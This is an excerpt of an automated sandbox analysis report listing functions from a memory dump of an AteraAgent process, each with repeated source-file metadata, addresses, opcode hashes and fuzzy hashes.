                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: f99e780a4b2373a8af8bceb898e5cd2310d149bdf7c1116113707d7f123ef683
                                                                                                                                                                                                                                                                            • Instruction ID: 71c79e1608abd744ee84f579eb8aa8cd21afee41dcbe016b713de8d856f23258
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f99e780a4b2373a8af8bceb898e5cd2310d149bdf7c1116113707d7f123ef683
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC216E52A1DF854FF795A768C8962F8BBE1EB5A291B0801BBD00EC71A3DD1D584B43C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB474090 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 23ce95f71b551e680ef21751c6d0c99ca6ec4e6a70ad4a544c0e604a596ce8e0
                                                                                                                                                                                                                                                                            • Instruction ID: 46b60b7600e751b4470db1ac9374f6033af7472c3a5aa9821aee20dc343076be
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 23ce95f71b551e680ef21751c6d0c99ca6ec4e6a70ad4a544c0e604a596ce8e0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0321C447A0E6D55FE251B7BCB8A54F96FE0EFD626570941F7E08DCA0A3DC081C4E8292
                                                                                                                                                                                                                                                                            Function 00007FFAAB463AA5 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 97f65ac7863788bbf1e657074209f1fd1be7636d8cb7fb19ca6f9a57f2168d2c
                                                                                                                                                                                                                                                                            • Instruction ID: 9932ed2e1c3086e7fc06ea3e3394eea3cc3fac8b40f8f7abf0cb427214f82163
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97f65ac7863788bbf1e657074209f1fd1be7636d8cb7fb19ca6f9a57f2168d2c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7531A47190AB8CCFDB42DB68C4505ADBFF1FF57340F1401AAD008DB2A2CA359945C7A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB485B50 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: c4fca5a09fcbae2713c149bcda9370e44298ebf21dbca2ef5efafaeca66e7134
                                                                                                                                                                                                                                                                            • Instruction ID: a465fbad8885343d66307c1c54068fa1e5b364ce43462204e99ab189db68e89a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c4fca5a09fcbae2713c149bcda9370e44298ebf21dbca2ef5efafaeca66e7134
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B631C22194E7C54FE7579B7488295753FE2AF53250B0980FBC48DCB1E3D919680AC3A2
                                                                                                                                                                                                                                                                            Function 00007FFAAB465201 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 26afb01f49d8c31a9c9ede3c95c404473a9b76c9fe7cf1e44b881f0f3765818c
                                                                                                                                                                                                                                                                            • Instruction ID: 2ae8847232c0cc36fac6820a249883ce252bc3d02e07bb64d3e229243ef8e514
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 26afb01f49d8c31a9c9ede3c95c404473a9b76c9fe7cf1e44b881f0f3765818c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF218370C09A5D8FDB85EF68C8556EDBBF0FF6A300F1401AAD409E7291CA349845CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB4609D0 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 4ef1c7f1d377c2f580e6b9232b42e395da395d14eba4f9c11c71d03ed33b02a1
                                                                                                                                                                                                                                                                            • Instruction ID: d1bde95f7fef4bf2740db8f2301316312fc128ec1abea12ba6e3e4646d42235a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef1c7f1d377c2f580e6b9232b42e395da395d14eba4f9c11c71d03ed33b02a1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91318171A0AB4CDFDB42DB78C440AAD7FF1EF97340F6441AAD048DB292CA35A945C7A1
                                                                                                                                                                                                                                                                            Function 00007FFAAB47AED8 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 905ed9a5d02cfbf662760e0d29e8afcdd9fece0948f9ece30cc25a91cfb49453
                                                                                                                                                                                                                                                                            • Instruction ID: 61e4d3d14ba33e7f53ef97ee6401df6c0090a9f552184bcb42fc9656d31e4959
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 905ed9a5d02cfbf662760e0d29e8afcdd9fece0948f9ece30cc25a91cfb49453
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C621F9A2C0EBCC9FE3059BA85801179BBA0EF47344F5441BBE04CC74E3E9259998C3C6
                                                                                                                                                                                                                                                                            Function 00007FFAAB479A48 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b09e100ae9c452d6d16b9e8509567d9bf67a61297cf9c9676854f98b7a5d00fd
                                                                                                                                                                                                                                                                            • Instruction ID: 2bd6f7d40ec616148eebd895c21f70bef88f8d51ef949f9be8adf740d50ae65b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b09e100ae9c452d6d16b9e8509567d9bf67a61297cf9c9676854f98b7a5d00fd
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DE21F73150E546DFDB55EB38C0859A67F91DF66310B2486FAD10CCF1A7D928A89AC3C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46BF1D Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 1ebeb4ed921c89504747e5d21d6b082fbc719591e4448c10497a7009cf843fb4
                                                                                                                                                                                                                                                                            • Instruction ID: 07fe214604feca31ab378fb5d6eb2b12a71d47b3d7d7c2362074b6a8c0d0e945
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ebeb4ed921c89504747e5d21d6b082fbc719591e4448c10497a7009cf843fb4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B214C2191DF868FD399DB28C8665B1BBF1FF5530074845FAC049C71A3DE28D8098741
                                                                                                                                                                                                                                                                            Function 00007FFAAB46425B Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: eaa5885b53a8739df3fbfece15cd2449454f7032c9078c9739a6eb8d6d4a2330
                                                                                                                                                                                                                                                                            • Instruction ID: 45318f332a1fa233ac88372e6a8555496d3a906e11e197e708c41487c58008c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eaa5885b53a8739df3fbfece15cd2449454f7032c9078c9739a6eb8d6d4a2330
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1218E3188E3C58FD7134B7068226E5BF789F03295F1A41E7D08CDB4A3D52D569AC7A2
                                                                                                                                                                                                                                                                            Function 00007FFAAB47E72F Relevance: .1, Instructions: 84COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 12689d8d11a731ca510a887213a0e64b4da7b15f487ccc400501b191454b849e
                                                                                                                                                                                                                                                                            • Instruction ID: f47cbd745174c32a589858a2adbf4baf96a1a345249489e609d1eea063a9de6f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 12689d8d11a731ca510a887213a0e64b4da7b15f487ccc400501b191454b849e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D21C561B189098FEB94FB2CC445AA937D1EF69340F0481B6E44DC72ABDD28EC89C3C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D325 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 79d03e1e7f8f9bafcc676f84eb471a41476098779d5f008f99b4295307e98cf8
                                                                                                                                                                                                                                                                            • Instruction ID: 65b7696de7374290d8c0bb4dea871941112ad7182c455034b2238bfc5bdfb17e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79d03e1e7f8f9bafcc676f84eb471a41476098779d5f008f99b4295307e98cf8
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91210A53A5DB965BD311B33CE4556E67BE0AFC1314F0589BBD0CECB1A3DD2868898381
                                                                                                                                                                                                                                                                            Function 00007FFAAB465220 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 3b8b1afa78c299b96dcadc9c54a660fc14a44814a0ae477feb366506da78c203
                                                                                                                                                                                                                                                                            • Instruction ID: faf56deb9fda072be41647beb63c49f7a4c2a31db42180bd6353785682c24103
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b8b1afa78c299b96dcadc9c54a660fc14a44814a0ae477feb366506da78c203
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA215E70D09A5D9FDF84EF68C855AEDBBF0FF5A340F14016AE409E3291CA30A841CB91
                                                                                                                                                                                                                                                                            Function 00007FFAAB475E20 Relevance: .1, Instructions: 78COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 52a60da726dc0bf9612f16c701b05522fa0b2f16cd701a4d481ffea767b93e4d
                                                                                                                                                                                                                                                                            • Instruction ID: 1f321a3395f8b60621ec6dadf1bc6c13eafe17c0ec564a160d3c43211e19bad9
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52a60da726dc0bf9612f16c701b05522fa0b2f16cd701a4d481ffea767b93e4d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD11E132B1DE4A4FAAE8D31CA45567973C2EBD92A5724403ED40EC72A8DD15EC8782C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB48AB5D Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 612d455415a312c93f995a1989f22f0ca442884d71a3e9f09753a12063169cbb
                                                                                                                                                                                                                                                                            • Instruction ID: cf4dca3b1a9624cb98d6aa51f4932240b15596210fdbbb413b892a24cb90c3a5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 612d455415a312c93f995a1989f22f0ca442884d71a3e9f09753a12063169cbb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0911EE3150EB888FDB89DF5CD8559A63FF0EF67320B04019BE049C71A2D661E849CBD2
                                                                                                                                                                                                                                                                            Function 00007FFAAB4760F0 Relevance: .1, Instructions: 77COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 669f4457e1616597edcb453563a4816c785ba0911ea5b38a5d67479a52a02514
                                                                                                                                                                                                                                                                            • Instruction ID: 43b0085437a32182c5e6130149135f2df13e82e5dfe9c158276beb5f3f90c5c1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 669f4457e1616597edcb453563a4816c785ba0911ea5b38a5d67479a52a02514
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7011E922F2ED494FF6D8426D3C9A1753AC3DB9A69170541BBE80CC3267DC218C85C2C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB477136 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 7a13d5cefc504ae468983d4a30a92197ee9dc34bef6afebe4c0c787511941eb7
                                                                                                                                                                                                                                                                            • Instruction ID: 983e5f272b5b4b4fdd8a0d63d11acf5060bcffb3196c8a0163bab3077a88cfbe
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a13d5cefc504ae468983d4a30a92197ee9dc34bef6afebe4c0c787511941eb7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9D11B17050CB889FE3789F28881C7A77BE4EBAA301F04457E94CCC3262EE306845C792
                                                                                                                                                                                                                                                                            Function 00007FFAAB475312 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: df182a1724010b5034b56f1c3058b23f01a19bba2fa5d529b5420492f11bbb3d
                                                                                                                                                                                                                                                                            • Instruction ID: d305b316a2767fd93aa2b9d110aaddbc4f60a707303aefdd14747689b4baea04
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: df182a1724010b5034b56f1c3058b23f01a19bba2fa5d529b5420492f11bbb3d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A5118672B1EF4A8FFAE8D65C90642B963D1EBA9390714457ED00DC71A5DD10EC4AC7C0
                                                                                                                                                                                                                                                                            Function 00007FFAAB47EA67 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ce6cc6f33d6acca569afbfdfb7ac1b2ac448454ee05194b5db1d084f55eaf49b
                                                                                                                                                                                                                                                                            • Instruction ID: a3355ae21390cd96abfe17577f8e1fb7f0d3e1c6b58c8220f8289fac4d7ed89b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce6cc6f33d6acca569afbfdfb7ac1b2ac448454ee05194b5db1d084f55eaf49b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F11E926A5EF898FF75A933858612B52BD1EF57260F0901ABD08CC7197DD495889C3C2
                                                                                                                                                                                                                                                                            Function 00007FFAAB4760E9 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 21ee589a8d46a465e26217937f1bbb74e98b6ec65bc08ee58bd002383e807392
                                                                                                                                                                                                                                                                            • Instruction ID: ec5dd6d918ca57e15c5f27de14a18e177f2957806731b99e5f25c69fbad3040c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21ee589a8d46a465e26217937f1bbb74e98b6ec65bc08ee58bd002383e807392
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA11E922F2EE498FF7D8826D2CAA1753AC3DB9564470541BAE44CC32A7DD218C45C6C1
                                                                                                                                                                                                                                                                            Function 00007FFAAB46D965 Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ce51ecf9a3b8dd0462d019ba823afb883624c5f7d857313ab2eac1eef936c85a
                                                                                                                                                                                                                                                                            • Instruction ID: eed65c86be1fa933611e7ed6a98df09c83db6a411def132f50b042d4a85cd5b5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce51ecf9a3b8dd0462d019ba823afb883624c5f7d857313ab2eac1eef936c85a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0113A7150E7C49FD3079B288865951BFF0AF6720574941EFE088CF1B3C529994AC762
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A01F Relevance: .1, Instructions: 66COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: b1e9140b9c1b02da986d3819835dc787eef3ec76643ae7e9704f22044e010182
                                                                                                                                                                                                                                                                            • Instruction ID: c996266adf734259f986aacdb66a054069ea5a1f5f759139ac33eef9f55af795
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1e9140b9c1b02da986d3819835dc787eef3ec76643ae7e9704f22044e010182
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0F115E70518B489FE7789F28C80DBB777E5EBA9311F00452EA48DC3262EE3068458782
                                                                                                                                                                                                                                                                            Function 00007FFAAB46A0F3 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000F.00000002.2650868270.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_15_2_7ffaab460000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
